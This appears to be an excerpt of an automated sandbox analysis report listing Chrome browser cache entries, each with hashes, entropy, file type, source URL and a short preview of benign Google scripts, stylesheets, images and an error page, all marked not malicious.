URL:	https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA
Preview:	{"chunkTypes":"3001111111110011100011111110011110001000010110100111111111111110011111111101110111111111111111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111011101111111131011011111111111101111111111111101111111111111111000110111111111111111111010100101111111111111111111111111111111111111111111112112221121112111122121111111111111111111111111101111111101011111111111111111111111100021222122121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121222121212121212121222122222222121212121212121212221212121212122121212121212121212121212111212221212121212121212121212112112111211212122221221221222122122122122122122122122122122122122122122122122122122122122122122122212212212212212212212121212122212222222222121221112122121212121212121213221

Chrome Cache Entry: 143

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:Hnhn:Bn
MD5:	BEEDCB4EB0A559E6CE2D1E20D38CB330
SHA1:	A04EE9801770C0E81B170D7992EC3735E878AA58
SHA-256:	6E9D99B87595B07B10676B68EBE9AA8B63DF7D9A74F59CC91EED60EA1FBDC6EF
SHA-512:	BD101CDF7FDF1210127D83CE76E3F6F6F1378259F0A55C112E39C49A9131B8636FB020E07E985B8427A35B62A544F2F7C5F75B11AD69EF2C4AE67A41BD5898B2
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAn11VQ7sgCk8RIFDWlIR0c=?alt=proto
Preview:	CgkKBw1pSEdHGgA=

Chrome Cache Entry: 144

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (10109), with no line terminators
Category:	downloaded
Size (bytes):	10109
Entropy (8bit):	5.303548249312523
Encrypted:	false
SSDEEP:	192:lXT0TGKiqggd/2FlbmVwFluVpGHjNjb/ySBb4x:loTGKQmVwtjNjU
MD5:	C81327CE05F2739305F61E83A6C05446
SHA1:	AB2C67BAF219EE7730269E652B894D9D337B1D5D
SHA-256:	7637C8A763E6F90772BB18F15A4EF50B1978313BECE75FB07B900CAD56D49979
SHA-512:	99F034CF708B8E130D5F4819B78CCECFC7D2E646E26B37A3377FC62C7BBA29BEA45C1ABE7D9520E11FB98B36D2E44BB9A32EF53332B00875CA6F143E163A2308
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qcwid,d_b_gm3,d_wi_gm3,d_lo_gm3/excm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 145

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	660
Entropy (8bit):	7.7436458678149815
Encrypted:	false
SSDEEP:	12:CPgCZ+X6xCDzNAs1dVc1rhVbo50xCmGjkm9vgZAO2YCGoOg/t+YcJNw:KZ+iC134tFoOxC3/vO2YCpR8YcJNw
MD5:	C3DFF0D9F30EC0BCF4DEC9524505916B
SHA1:	4B378403ACBEBC3747E08C69B5FD7770A850C9EB
SHA-256:	73D788F86BE22112BB53762545989C0F1BBDB7343161130952C9BA3834FF81E3
SHA-512:	677EA304D00D176ACF61FF68BF23BD5F77AD2928D7DE9F4B842292BC9D3FB7029FE9F578B62F142DCE689230F392E828098EED3484FE2DBEE6E1A7AA5378E2C6
Malicious:	false
URL:	https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp
Preview:	RIFF....WEBPVP8L..../'....Hv.=n.......Q...a..(Rv.o..U.....l..m........0l.6l..f.......A?B.C.A...2h..Ag0....G8.n#)R.j.x..P.F..I;.Ox......7-...bX./..]...3..T....5...x...G.C....%.u.....u/._.=....<!q.\...9.....\....p:..P.4.aS.N).>.>.."..9..Vh ....no....l.1..#6p\c..2..>..=8...........FP.^....+/.~......hs..D.Jm..9...r....t*.H..~T^\|.....l..l......he..}f....d.."....K...&1..................pl.Pf.%6...2X..I...eXQ(.K..1%c..w.s._..._K`K.1}..D.E=...<..ytM..>.q'.e.L.~$...b..;k.M.....t\O..m.I._..F....'........z.]..u?~..P.zJM.. k...p~9..D....".Zl$?f..+...\.Pg..%...;.[R>N.#.W.e..@q...(....]&......K.......?.\|.z..(...:&m.V.C.'...D^.R....

Chrome Cache Entry: 146

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1136)
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	5.249530958699059
Encrypted:	false
SSDEEP:	24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
MD5:	FBE36EB2EECF1B90451A3A72701E49D2
SHA1:	AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
SHA-256:	E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
SHA-512:	7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww

Chrome Cache Entry: 147

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1689), with no line terminators
Category:	downloaded
Size (bytes):	1689
Entropy (8bit):	5.640520027557763
Encrypted:	false
SSDEEP:	48:ifKf9wIe7P3SJgX4DW45JUzBG/t5JUTLF5Jv325Jvhv:5De7Pn4DW+Go3GnXdcHv
MD5:	45DD7BD58C9F085DA52FA16A2A150066
SHA1:	9B5CF4B288EDE14AE8834F3EF2A58145B8EC8CBC
SHA-256:	0D5C53FCC37C7A2CE26367BBE6197FCD9272DD7EBC81823D088A4DFFF5AE599B
SHA-512:	520B8DF68524C2CEF393B837D7EAD0168028C94697E1DA0AC4BDDAFAB849D1B26D7E7933082146AE6A220A449F066CBBBA2EBFC6CC30D3F756FBD98EE061C8DF
Malicious:	false
URL:	"https://www.google.com/xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=0/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=sylx,sypx?xjs=s4"
Preview:	.MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:var(--Nsm0ce);--izGsqb:var(--Nsm0ce);--todMNcl:var(--EpFNW);--p9J9c:var(--Nsm0ce)}:root{--KIZPne:#a3c9ff;--xPpiM:#001d35;--Ehh4mf:var(--Nsm0ce)}:root{--Yi4Nb:#d2d2d2;--pEa0Bc:#474747;--kloG3:#d2d2d2;--YaIeMb:#f7f8f9;--Pa8Wlb:#0b57d0;--izGsqb:#0b57d0;--todMNcl:#fff;--p9J9c:#0b57d0}.EpPYLd{display:block;position:relative}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default}.LGiluc,.EpPYLd[disabled]{pointer-events:none;cursor:default}@media (forced-colors:active){.EpPYLd[disabled]{color:GrayText}}.LGiluc{border-top:1px solid;height:0;

Chrome Cache Entry: 148

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	dropped
Size (bytes):	112204
Entropy (8bit):	5.488876769469394
Encrypted:	false
SSDEEP:	1536:ON+4tY0S2yvGnf4vA6s/RXIGDXO9qJUMKur0K3niBBrltmCw3wnWs/ZuTZVUGkpB:T2yvefrtJUEgK3Cvw3wWs/ZuTZVLK
MD5:	BF1BB6702DFE2FAA3EF4331330B32EA8
SHA1:	8F2DAEF516E248C6811D45341A9F8A6264EFFF35
SHA-256:	754F69A8CC7403F6A549C8AF6721E8850F3EC12066B5C49322F262572F3A36F6
SHA-512:	27515F5BFC53E8014E7BF77EB08A223300D7BC9CB8469111FA54024D10F9A5701AF4842EF202F31D127389D6396749EB1AF4A433FC566697BA6123D79C9FF9FB
Malicious:	false
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 149

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 500 x 200
Category:	downloaded
Size (bytes):	87886
Entropy (8bit):	7.923145312246842
Encrypted:	false
SSDEEP:	1536:GSt6ayKFLQ+Jewj+iLZi4KK0t2lzh5QwF+zEKwg9emI20:/7FLQ+RLU1t2H5vF+zEFse20
MD5:	55653D73F359016F5BCB0B90183F61DF
SHA1:	5590B7239430E19542408D89B1C68CD63513F5CA
SHA-256:	050CA6FB6DBFD30B004B5013CEF04BEF2739C3E8ED0D9D83B0DE95A9B3E4FEC5
SHA-512:	F6488D2BED1EF9E3A9D90B3AAAB570A7A68E59635721D94F7AC66F40230F0E9EC5C150AEB6C1E05CD6007CD77CB25F3FE8B06DF970AA5885FD1309302EB11E38
Malicious:	false
URL:	https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif
Preview:	GIF89a..............N...........[......G..N...ppp..Z.............Dv...\hK...TH.q....l..KKJm....m....H.H..$..........J.......qm.........3b_U...P\..] N[l..Hc....G.S.n#].A.\..\.q....D:..$....'..S...3..r..Ph...l.d)....................$.h....q.L.....&(s.k....'L......Iro.........U...mkI.i.H..y.qNK......o..i............s.{...fS..G..Qjo.............w@r./..7...."..N...Go....w..n.qs...&.NFOt....8.@...kT8.GqNk..&.........IsM......IA.9.."...;.e..,R...~.R....-.F.....2}...i....d`.>......"....&."".........4............3"..............".35....................3....... .................3.........."!..............=..7...................3"...............".........34............6..........................T.{............3....."7.3x..3......."G..C".....!..NETSCAPE2.0.....!.......,...............H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....

Chrome Cache Entry: 150

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3899)
Category:	downloaded
Size (bytes):	118881
Entropy (8bit):	5.714253851019467
Encrypted:	false
SSDEEP:	1536:aPlunKLV8eCO8V8OLHVKTFQrFADJrZEDFiUPGZ+bBdkJmmI6b5+h+o:kE0CNO+ruDJr+DuZ+1dUbC
MD5:	EAB020600F510361F88605A036877B0A
SHA1:	4843848F3946B852EC269520BEFEB3F60605F50E
SHA-256:	7E893C9803E288893FD7C8CEAEA360F3AC6341E3A69C802FCB045E989AE7E2EC
SHA-512:	8EFED6F0E07AFEA313DEFBC0D027C1070B3D22AE63AFF8E8E27CAB0653EC13710ECF76C02615B9C884D48D847AFCC83D58B2B4200737E1340A8B315307821454
Malicious:	false
URL:	"https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=NzU6V,syyx,sygo,zGLm3b,syvy,syvz,syvp,DhPYme,syy3,syxy,syy1,syy0,sywi,sywj,syxz,syxw,syxx,KHourd,MpJwZc,UUJqVe,sy7o,sOXFj,sy7n,s39S4,oGtAuc,NTMZac,nAFL3,sy81,sy80,q0xTif,y05UD,sy12k,sy192,sy18w,syx4,sy18p,syx3,syx2,syx1,sy18v,sy13u,sy18m,sy13y,sy18u,sy12g,sy18q,syh2,sy13z,sy18x,sy126,sy18t,sy18r,sy18s,sy18z,sy18h,sy18n,sy18g,sy18l,sy18i,sy18d,sy14u,sy141,sy142,syx9,syxa,epYOx?xjs=s3"
Preview:	_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.ea0Lbe{background:#fff;border-radius:24px;box-shadow:0px 4px 6px rgba(32,33,36,0.28);margin-left:-4px;margin-top:0;position:absolute;top:-4px;width:calc(100% + 8px);z-index:989}.KoWHpd{margin:20px}.BiKNf{align-self:flex-end;cursor:pointer;display:flex;padding:14px;position:absolute;right:6px;top:6px}.p4pvTd{color:rgb(32,33,36);font-family:\"Google Sans Display\",Roboto,Arial,sans-serif;font-size:16px;font-weight:normal;line-height:28px;margin:0 0 14px;text-align:center;letter-spacing:.1px}.BH9rn{align-items:center;display:inline-flex;flex-direction:row;flex-grow:1;justify-content:normal;padding-top:16px}.gIYJUc{background:rgb(248,249,250);border:1px dashed #c0c0c0;border-radius:8px;box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;height:280px;position:relative;width:100%}.Ndj4R{border:1px dashed #c0c0c0}.id5vMb{border:1px dashed #c0c0c0}.f6GA0{heig

Chrome Cache Entry: 151

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (738)
Category:	downloaded
Size (bytes):	29656
Entropy (8bit):	5.406135809851131
Encrypted:	false
SSDEEP:	768:eJXCo24pgJbYH5qjhjCd0FMYF/rjhva+sSGVimetltFQFLuqixyfpEYYAAoaVv/J:YXCo2FjNxhSExy2Yygfzq
MD5:	690F96BA16BC36422BCD78F06C475528
SHA1:	EDA7E57CA609F351066CE989EE33B03546453F90
SHA-256:	08B431CCA8C904AA60BF13EE4D307550FBC41F6D268C7AAE398FD030A2400411
SHA-512:	87C128F9777358A0643FAD66B9C0732E99451EEA6AA1117063A130B89C89B9C505E7BB19DBBB3FA83360E7DF779236384C3015F5AEACB43E012401B0573D5CEC
Malicious:	false
URL:	"https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=syt5,syt4,VsqSCc,sy1b7,P10Owf,sy19z,sy19x,sysj,gSZvdb,syyf,syye,WlNQGd,sysn,sysl,sysk,sysi,DPreE,syys,syyq,nabPbb,syy9,syy7,sylx,sypx,CnSW2d,kQvlef,syyr,fXO0xe?xjs=s4"
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.aec=_.Md("VsqSCc",[]);.}catch(e){_._DumpException(e)}.try{.var Wdc;_.Ydc=function(a){return Wdc("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.Xdc(a),hashtag:"#GoogleDoodle"})};_.Zdc=function(a){return Wdc("https://twitter.com/intent/tweet",{text:a})};_.$dc=function(a,b){return Wdc("mailto:",{subject:a,body:b})};_.Xdc=function(a){var b=a;b&&b.indexOf("//")===0&&(b="https:"+a);return b};Wdc=function(a,b){var c=new _.qn,d;for(d in b)c.add(d,b[d]);a=new _.mh(a);_.mn(a,c);return a.toString()};.}catch(e){_._DumpException(e)}.try{._.y("VsqSCc");.var bec=function(a){1!=a.Qgb&&_.wob(a,!0)},cec=function(a){a.ewb=!1;_.xob(a,!1)},dec=function(){_.Yd.call(this);var a=this;this.dialog=new _.ys("ddlshare-dialog");this.dialog.eKa(!1);_.Aob(this.dialog,!0);this.dialog.d4a=!0;_.Bob(this.dialog);bec(this.dialog);cec(this.dialog);_.vob(this.dialog,.95);this.Zc=new _.Fm(this);this.ka=new _.xTa;_.Ee("ddle","0",!0);_.Be("dd

Chrome Cache Entry: 152

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (537)
Category:	downloaded
Size (bytes):	1522
Entropy (8bit):	5.053361437407589
Encrypted:	false
SSDEEP:	24:XrNum/T86/kCwQmMdfrMW8HqhL8UP7dhrR/MvQOil1I6jDWVl1qrsRrd7vyDBw:XrNdIaV7djMrqhLrPl089GFq0h+De
MD5:	316A0F64B05BCCA4103CBD6AA1A68EDB
SHA1:	A6E0292DA4411FCFA56F96F1B111F26EB47F227F
SHA-256:	8A0B0566A63234568121062D456A55C198670B9556DB671C192C40FACEF1D091
SHA-512:	C14B85EE7C3146AD79FE291BC88550B4F677A330AEC1ABC5CB67072C97DEC6A5D97411E11CCE3A51B96DA8C2DDD09C51E49EC264D6A0D47E5E9B633D9DAFAAA4
Malicious:	false
URL:	https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=aLUfP?xjs=s4
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.y("aLUfP");.var VEb=function(a){this.Qr=a};var WEb=function(a){_.On.call(this);var b=this;this.window=a.service.window.get();this.wa=this.Qr();this.oa=window.orientation;this.ka=function(){var c=b.Qr(),d="orientation"in window&&Math.abs(window.orientation)===90&&b.oa===-1window.orientation;b.oa=window.orientation;if(c!==b.wa\|\|d){b.wa=c;d=_.cb(b.listeners);for(var e=d.next();!e.done;e=d.next()){e=e.value;var f=new VEb(c);try{e(f)}catch(g){_.da(g)}}}};this.listeners=new Set;this.window.addEventListener("resize",this.ka);"orientation"in window&&.this.window.addEventListener("orientationchange",this.ka)};_.G(WEb,_.Pn);WEb.Ha=function(){return{service:{window:_.Qn}}};_.m=WEb.prototype;_.m.addListener=function(a){this.listeners.add(a)};_.m.removeListener=function(a){this.listeners.delete(a)};._.m.Qr=function(){if(_.va()&&_.pa()&&!navigator.userAgent.includes("GSA")){var a=_.rl(this.window);a=new _.hl(a.width,Math.round(a.widththis.

Chrome Cache Entry: 153

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	dropped
Size (bytes):	660
Entropy (8bit):	7.7436458678149815
Encrypted:	false
SSDEEP:	12:CPgCZ+X6xCDzNAs1dVc1rhVbo50xCmGjkm9vgZAO2YCGoOg/t+YcJNw:KZ+iC134tFoOxC3/vO2YCpR8YcJNw
MD5:	C3DFF0D9F30EC0BCF4DEC9524505916B
SHA1:	4B378403ACBEBC3747E08C69B5FD7770A850C9EB
SHA-256:	73D788F86BE22112BB53762545989C0F1BBDB7343161130952C9BA3834FF81E3
SHA-512:	677EA304D00D176ACF61FF68BF23BD5F77AD2928D7DE9F4B842292BC9D3FB7029FE9F578B62F142DCE689230F392E828098EED3484FE2DBEE6E1A7AA5378E2C6
Malicious:	false
Preview:	RIFF....WEBPVP8L..../'....Hv.=n.......Q...a..(Rv.o..U.....l..m........0l.6l..f.......A?B.C.A...2h..Ag0....G8.n#)R.j.x..P.F..I;.Ox......7-...bX./..]...3..T....5...x...G.C....%.u.....u/._.=....<!q.\...9.....\....p:..P.4.aS.N).>.>.."..9..Vh ....no....l.1..#6p\c..2..>..=8...........FP.^....+/.~......hs..D.Jm..9...r....t*.H..~T^\|.....l..l......he..}f....d.."....K...&1..................pl.Pf.%6...2X..I...eXQ(.K..1%c..w.s._..._K`K.1}..D.E=...<..ytM..>.q'.e.L.~$...b..;k.M.....t\O..m.I._..F....'........z.]..u?~..P.zJM.. k...p~9..D....".Zl$?f..+...\.Pg..%...;.[R>N.#.W.e..@q...(....]&......K.......?.\|.z..(...:&m.V.C.'...D^.R....

Chrome Cache Entry: 154

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1136)
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	5.249530958699059
Encrypted:	false
SSDEEP:	24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
MD5:	FBE36EB2EECF1B90451A3A72701E49D2
SHA1:	AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
SHA-256:	E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
SHA-512:	7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww

Chrome Cache Entry: 155

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	101
Entropy (8bit):	5.146139830917723
Encrypted:	false
SSDEEP:	3:VyUH/cIdaSr8WRqRpEWJUkDZHG6JElJWdHZ+4LQpNYe:Vye/cIdaYVRqvRZLJkWdHAHpue
MD5:	41DBAE7F90B1E8138CD51C2EB7B12CBC
SHA1:	3F041ED27B233D3BE9D7DFA23DB7CB30936B57B0
SHA-256:	FA62580F22C0905DD8959C79D01A3E0D3D5DF27789145ED635C70A1CAB0BA41D
SHA-512:	1384948B54D81E1EECA622E79B4E03C2CCFE407C6F02DC6C728CB9E967390D97BFAB978E670D5C6DB572783E2A083D9724C8ED19DF704054C1FF90E9B8B9328F
Malicious:	false
URL:	"https://www.google.com/async/hpba?yv=3&cs=0&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/dg%3D0/br%3D1/rs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:/xjs/_/ss/k%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAA